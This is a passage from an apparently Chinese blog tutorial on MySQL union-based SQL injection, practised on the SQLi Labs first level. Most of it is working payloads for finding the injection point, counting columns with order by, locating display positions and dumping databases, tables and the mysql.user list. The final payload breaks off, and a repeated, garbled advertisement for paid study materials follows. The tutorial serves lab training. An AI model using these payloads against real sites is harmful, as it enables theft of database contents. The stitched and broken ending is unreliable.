- version():返回数据库版本
- @@datadir:返回数据库安装路径
如果你不理解这个查询语句的格式,可以在自己的数据库中执行以下几个SQL,并观察结果:
select database();
select 1;
select 1,2,3;
select 1,database(),version();
3. 空查询
正常的用户id都是从1开始自增的,如果查询的id为0或者是负数,一定是空查询。
在地址栏输入:?id=0' union select 1,version(),@@datadir -- a
程序的执行逻辑如下:
除此之外,我们可以将 union 右侧的查询语句替换成其他内容,以获取数据库中的所有信息。
以上便是联合查询的基本原理,接下来,我们在实战案例中使用一下联合注入。
三、实战教程
还是上面的测试网站(SQLi Labs靶场的第一关),先来测试注入点。
地址栏输入 ?id=1' and 1 -- a
,页面正常显示:
地址栏输入 ?id=1' and 0 -- a
,页面异常(空)显示:
确定注入点:单引号字符型注入。
接下来,开始使用联合注入,地址栏输入以下payload:
?id=0' union select 1,2 -- a
页面报错了……字段数不同
MySQL规定,union 关键字连接的两个查询语句,查询的字段数必须保持一致。
这就意味着,我们在使用联合注入之前,必须先要判断网站的查询语句,查询了几个字段,这里,我们使用 order by 来判断查询的字段数。
order by 关键字可以按照指定字段排序,如果排序的字段不存在,则会报错。
利用这一特性,我们可以从第一个字段开始排序,然后是第二个、第三个……,当页面出现报错时,就可以判断出网站的查询字段数。
先按照第一个字段排序,地址栏输入 ?id=1' order by 1 -- a
再按照第二个字段排序,地址栏输入 ?id=1' order by 2 -- a
再按照第三个字段排序,地址栏输入 ?id=1' order by 3 -- a
再按照第四个字段排序,地址栏输入 ?id=1' order by 4 -- a
第四个字段排序时开始报错,可以确认第四个字段不存在,网站查询语句的查询字段有只有三个。
字段确定以后,我们就可以使用联合查询了,地址栏输入以下payload:
?id=0' union select 1,2,3 -- a
从页面的响应我们可以看到,2和3的位置可以显示出来,1的位置没有显示出来,因此,我们可以在2或者3的位置返回查询结果。
我们将 2 的位置换成一个函数(获取当前使用的数据库),在地址栏输入以下payload:
?id=0' union select 1,database(),3 -- a
页面中显示了当前使用的数据库:
接下来,我们在 2 的位置返回查询语句的结果(数据库的所有用户),在地址栏输入以下payload:
?id=0' union select 1,(select group_concat(user) from mysql.user),3 -- a
提示:
- 使用括号包裹SQL,可以让数据库把括号中的内容当做一个整体执行。
- 字段处使用 group_concat() 函数,可以将查询结果拼接成一个字符串(可以尝试不加此函数来观察页面的响应结果),不了解次函数的同学可以参考我的另一篇文章:MySQL group_concat函数使用详解
我们可以在 2 的位置替换不同的查询语句,来获取数据库中的所有数据。
接下来,我们整理一下联合注入的使用步骤。
四、使用步骤
使用前提:页面有显示位
比如用户登录成功以后,会在页面中显示用户名等信息。
需要注意的是,页面中显示的数据必须是动态数据,不能是写死的。
1. 判断注入点类型
同时满足以下两个条件:
?id=1 and true -- a 正常显示
?id=1 and false -- a 空显示
2. 判断字段数
?id=1 order by 1 -- a 正常显示
?id=1 order by 2 -- a 正常显示
?id=1 order by 3 -- a 报错或异常显示(字段数为2)
3. 判断显示位
?id=0 union select 1,2,3 -- a
4. 脱库
脱库就是获取数据库中所有数据的意思,不了解脱库的同学可以参考我的另一篇文章:MySQL脱库原理详解
爆库
?id=-1 union select 1,
(select group_concat(schema_name)
from information_schema.schemata)
,3 -- a
爆表
?id=-1 union select 1,
(select group_concat(table_name)
from information_schema.tables
where table_schema='security')
,3 -- a
爆字段
?id=-1 union select 1,
**先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7**
**深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**
**因此收集整理了一份《2024年最新网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**
![img](https://img-blog.csdnimg.cn/img_convert/5709012883c62068e0ccac3a24204233.png)
![img](https://img-blog.csdnimg.cn/img_convert/459d305d91f2a5c0b326eae90e04e031.png)
![img](https://img-blog.csdnimg.cn/img_convert/1411b5ad0a1809e8d7fe28980d671966.png)
![img](https://img-blog.csdnimg.cn/img_convert/b0b8eb13e190a6924c27efbe3ccd5542.png)
![img](https://img-blog.csdnimg.cn/img_convert/f0dda57578a4e8c93d81f73cc125ef31.png)
![img](https://img-blog.csdnimg.cn/img_convert/78d9963f6c315167745c0c883ba113aa.png)
**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!**
**由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新**
**[需要这份系统化资料的朋友,可以点击这里获取](https://bbs.csdn.net/topics/618540462)**
089146)]
**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!**
**由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新**
**[需要这份系统化资料的朋友,可以点击这里获取](https://bbs.csdn.net/topics/618540462)**